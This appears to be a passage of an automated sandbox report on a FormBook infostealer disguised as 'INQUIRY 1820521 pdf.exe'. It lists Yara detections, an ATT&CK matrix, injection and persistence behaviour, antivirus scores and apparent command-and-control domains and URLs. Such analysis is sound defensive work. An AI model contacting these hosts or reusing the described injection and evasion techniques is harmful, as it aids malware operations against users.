          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion41NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 385289 Sample: INQUIRY 1820521 pdf.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for dropped file 2->54 56 9 other signatures 2->56 10 INQUIRY 1820521 pdf.exe 7 2->10         started        process3 file4 38 C:\Users\user\AppData\...\YAhcdYrYHFkNNf.exe, PE32 10->38 dropped 40 C:\Users\user\AppData\Local\...\tmp7085.tmp, XML 10->40 dropped 42 C:\Users\user\...\INQUIRY 1820521 pdf.exe.log, ASCII 10->42 dropped 62 Injects a PE file into a foreign processes 10->62 14 INQUIRY 1820521 pdf.exe 10->14         started        17 schtasks.exe 1 10->17         started        19 INQUIRY 1820521 pdf.exe 10->19         started        21 2 other processes 10->21 signatures5 process6 signatures7 70 Modifies the context of a thread in another process (thread injection) 14->70 72 Maps a DLL or memory area into another process 14->72 74 Sample uses process hollowing technique 14->74 76 Queues an APC in another process (thread injection) 14->76 23 explorer.exe 14->23 injected 27 conhost.exe 17->27         started        process8 dnsIp9 44 hhcuerkn.com 210.152.87.233, 49732, 80 IDCFIDCFrontierIncJP Japan 23->44 46 www.xinghai-nb.com 104.21.82.58, 49745, 80 CLOUDFLARENETUS United States 23->46 48 3 other IPs or domains 23->48 58 System process connects to network (likely due to code injection or exploit) 23->58 60 Uses ipconfig to lookup or modify the Windows network settings 23->60 29 ipconfig.exe 23->29         started        32 autochk.exe 23->32         started        signatures10 process11 signatures12 64 Modifies the context of a thread in another process (thread injection) 29->64 66 Maps a DLL or memory area into another process 29->66 68 Tries to detect virtualization through RDTSC time measurements 29->68 34 cmd.exe 1 29->34         started        process13 process14 36 conhost.exe 34->36         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INQUIRY 1820521 pdf.exe39%VirustotalBrowse
          INQUIRY 1820521 pdf.exe19%MetadefenderBrowse
          INQUIRY 1820521 pdf.exe41%ReversingLabsByteCode-MSIL.Spyware.Noon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe19%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe41%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          hhcuerkn.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cnP0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT0%Avira URL Cloudsafe
          http://www.goodfont.co.kr-e0%Avira URL Cloudsafe
          http://www.carterandcone.comTCV0%Avira URL Cloudsafe
          http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://weather.gc.ca/astro/seeing_e.html)0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.monotype.5;M0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnD0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.com?0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnl0%URL Reputationsafe
          http://www.founder.com.cn/cnl0%URL Reputationsafe
          http://www.founder.com.cn/cnl0%URL Reputationsafe
          http://www.founder.com.cn/cn0A0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.com110%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.goodfont.co.krs-cz0%Avira URL Cloudsafe
          http://www.sandoll.co.kr?0%Avira URL Cloudsafe
          http://www.tiro.comTZ0%Avira URL Cloudsafe
          http://www.carterandcone.come70%Avira URL Cloudsafe
          www.auggiepaws.com/gnk/0%Avira URL Cloudsafe
          http://www.tiro.coms0%Avira URL Cloudsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.coms-c0%Avira URL Cloudsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.cn/cnCg0%Avira URL Cloudsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://www.founder.com.c~0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.sandoll.co.krim0%Avira URL Cloudsafe
          http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM00%Avira URL Cloudsafe
          http://www.founder.com.cn/cnu-e0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.xinghai-nb.com
          		104.21.82.58
          		truetrue
            		unknown
            hhcuerkn.com
            		210.152.87.233
            		truetrueunknown
            ext-sq.squarespace.com
            		198.185.159.144
            		truefalse
              		high
              www.hhcuerkn.com
              		unknown
              		unknowntrue
                		unknown
                www.mobcitylabs.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuTtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0true
                  • Avira URL Cloud: safe
                  		unknown
                  www.auggiepaws.com/gnk/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGINQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cnPINQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheINQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.goodfont.co.kr-eINQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers?INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comTCVINQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmpfalse
                            		high
                            http://www.tiro.comexplorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmpfalse
                              		high
                              http://weather.gc.ca/astro/seeing_e.html)INQUIRY 1820521 pdf.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krINQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
